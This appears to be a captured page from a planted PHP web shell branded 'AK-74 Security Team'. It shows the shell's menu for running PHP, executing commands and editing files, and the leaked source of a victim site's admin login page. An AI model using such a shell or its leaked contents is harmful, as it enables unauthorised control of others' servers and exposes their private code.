.:: :[ AK-74 Security Team Web-shell ]: ::.
General information
File manager
phpinfo()
Run PHP
Execute the command
Edit the file
<?php include_once 'inc/function.php'; $admin=new Admin(); $error=''; if(isset($_POST['signin'])){ $login = $admin->admin_login($db,$_POST); if ($login) { /***** login success ******/ header("location:".ADMINURL."/dashboard.php"); } else { /****** login failed ******/ $error = 1; } } ?> <!DOCTYPE html> <html dir="ltr" lang="en"> <head> <title><?=TITLE?></title> <link rel="shortcut icon" href="<?=ADMINURL?>/images/favicon.png"> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <link rel="stylesheet" type="text/css" href="<?=ADMINURL?>/css/bootstrap.min.css" /> <link rel="stylesheet" type="text/css" href="<?=ADMINURL?>/css/sugam.css" /> </head> <body class="admin-panel"> <div class="error-page" id="login-box"> <div class="error-top"> <center><div class="logo"><img src="images/logo.png" class="img-responsive"></div></center> <div class="login"> <h3 class="inner-title t-inner">ADMINISTRATION PANEL</h3> <form method="post" id="login-form"> <input type="text" placeholder="Username" name="username" autofocus autocomplete="off"> <input type="password" placeholder="Password" name="password" autocomplete="off"> <div class="submit"> <input type="submit" name="signin" value="Sign in to Panel"> </div> <div class="clearfix"></div> </form> </div> <?php if(!empty($error)){ ?> <div class="alert alert-danger"> <strong>Warning!</strong> Please enter valid login credentials <?php } ?> </div> </div> </div> <div id="particles-js"></div> <script type="text/javascript" src="<?=ADMINURL?>/js/jquery.min.js"></script> <script type="text/javascript" src="<?=ADMINURL?>/js/jquery.validate.min.js"></script> <script type="text/javascript" src="<?=ADMINURL?>/js/jquery.admin.panel.js"></script> <script type="text/javascript" src="<?=ADMINURL?>/js/system.js"></script> </body> </html>
Rename:
-